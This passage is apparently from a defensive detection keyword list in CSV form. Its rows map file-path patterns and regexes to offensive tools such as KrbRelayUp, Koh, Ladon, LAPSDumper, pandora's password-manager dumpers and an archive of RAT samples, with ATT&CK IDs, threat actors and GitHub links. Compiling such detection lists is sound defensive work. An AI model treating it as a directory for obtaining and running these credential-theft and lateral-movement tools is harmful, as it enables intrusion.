"*\Koh\Koh.*",".{0,1000}\\Koh\\Koh\..{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - 
Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","16163" "*\Koppeling.sln*",".{0,1000}\\Koppeling\.sln.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","16164" "*\KPortScan 3.0\*",".{0,1000}\\KPortScan\s3\.0\\.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","Dispossessor","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","0","N/A","N/A","8","1","2","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z","16165" "*\KPortScan\*",".{0,1000}\\KPortScan\\.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","Dispossessor","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","0","N/A","N/A","8","1","2","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z","16166" "*\kratserver.exe*",".{0,1000}\\kratserver\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16167" "*\kratserver.vshost.exe*",".{0,1000}\\kratserver\.vshost\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16168" "*\krb5\*.py",".{0,1000}\\krb5\\.{0,1000}\.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16169" "*\KrbRelay.exe*",".{0,1000}\\KrbRelay\.exe.{0,1000}","offensive_tool_keyword","KrbRelay","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - 
T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KrbRelay","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16170" "*\KrbRelay.exe*",".{0,1000}\\KrbRelay\.exe.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","16171" "*\KrbRelay.exe*",".{0,1000}\\KrbRelay\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","16172" "*\KrbRelay.exe*",".{0,1000}\\KrbRelay\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KrbRelay","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16173" "*\KrbRelay.exe*",".{0,1000}\\KrbRelay\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16174" "*\KrbRelay-SMBServer.sln*",".{0,1000}\\KrbRelay\-SMBServer\.sln.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","16175" "*\KrbRelayUp.exe*",".{0,1000}\\KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","KrbRelayUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16176" "*\KrbRelayUp.exe*",".{0,1000}\\KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - 
TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","16177" "*\KrbRelayUp.exe*",".{0,1000}\\KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16178" "*\KrbRelayUp.exe*",".{0,1000}\\KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16179" "*\KrbRelayUp.lib*",".{0,1000}\\KrbRelayUp\.lib.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege 
Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","16180" "*\KrbSCM.cs*",".{0,1000}\\KrbSCM\.cs.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","16181" "*\krbtgtAccounts.json*",".{0,1000}\\krbtgtAccounts\.json.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","16182" "*\KRBUACBypass*",".{0,1000}\\KRBUACBypass.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","16183" "*\Krueger.exe*",".{0,1000}\\Krueger\.exe.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","0","N/A","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","16184" "*\kuhl_m_sekurlsa.c*",".{0,1000}\\kuhl_m_sekurlsa\.c.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential 
Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","16186" "*\Kula RAT Beta.exe*",".{0,1000}\\Kula\sRAT\sBeta\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16187" "*\Kurd Rat v1.0 Beta.exe*",".{0,1000}\\Kurd\sRat\sv1\.0\sBeta\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16188" "*\KYMS-RAT v 2.*.exe*",".{0,1000}\\KYMS\-RAT\sv\s2\..{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16189" "*\L6-Rat Beta 1.exe*",".{0,1000}\\L6\-Rat\sBeta\s1\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16190" "*\l6-Rat crypter.exe*",".{0,1000}\\l6\-Rat\scrypter\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16191" "*\Ladon.exe*",".{0,1000}\\Ladon\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16192" "*\Ladon.exe*",".{0,1000}\\Ladon\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","16193" "*\Ladon.ps1*",".{0,1000}\\Ladon\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","16194" "*\Ladon1.exe*",".{0,1000}\\Ladon1\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - 
T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16195" "*\LaLa-Rat.exe*",".{0,1000}\\LaLa\-Rat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16196" "*\lambdaenum.py*",".{0,1000}\\lambdaenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","16197" "*\LaMe RAT v1.0.exe*",".{0,1000}\\LaMe\sRAT\sv1\.0\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16198" "*\laps.py*",".{0,1000}\\laps\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16202" "*\LAPSDumper\*",".{0,1000}\\LAPSDumper\\.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","N/A","10","3","267","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z","16203" "*\LAPSToolkit.ps1*",".{0,1000}\\LAPSToolkit\.ps1.{0,1000}","offensive_tool_keyword","LAPSToolkit","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","LAPSToolkit","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16204" "*\LAPSToolkit.ps1*",".{0,1000}\\LAPSToolkit\.ps1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","LAPSToolkit","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16205" "*\LastenLoader.exe*",".{0,1000}\\LastenLoader\.exe.{0,1000}","offensive_tool_keyword","Lastenzug","Socks4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - 
TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","0","N/A","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","16206" "*\lastpass\getCredslastpassEntries.h*",".{0,1000}\\lastpass\\getCredslastpassEntries\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","16207" "*\lastpass\getCredslastpassMasterPass.h*",".{0,1000}\\lastpass\\getCredslastpassMasterPass\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","16208" "*\lastpass\getCredslastpassMasterUsername.h*",".{0,1000}\\lastpass\\getCredslastpassMasterUsername\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","16209" "*\Lateral movement.cna*",".{0,1000}\\Lateral\smovement\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - 
TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16210" "*\lateral_wmi.py*",".{0,1000}\\lateral_wmi\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","16211" "*\LatLoader.py*",".{0,1000}\\LatLoader\.py.{0,1000}","offensive_tool_keyword","LatLoader","PoC module to demonstrate automated lateral movement with the Havoc C2 framework","T1570 - T1071 - T1021 - T1563 - T1105","TA0008 - TA0011 - TA0002 - TA0010","N/A","N/A","Lateral Movement","https://github.com/icyguider/LatLoader","1","0","N/A","N/A","9","4","301","35","2023-12-09T00:28:32Z","2023-10-06T15:03:17Z","16212" "*\LatLoader-main*",".{0,1000}\\LatLoader\-main.{0,1000}","offensive_tool_keyword","LatLoader","PoC module to demonstrate automated lateral movement with the Havoc C2 framework","T1570 - T1071 - T1021 - T1563 - T1105","TA0008 - TA0011 - TA0002 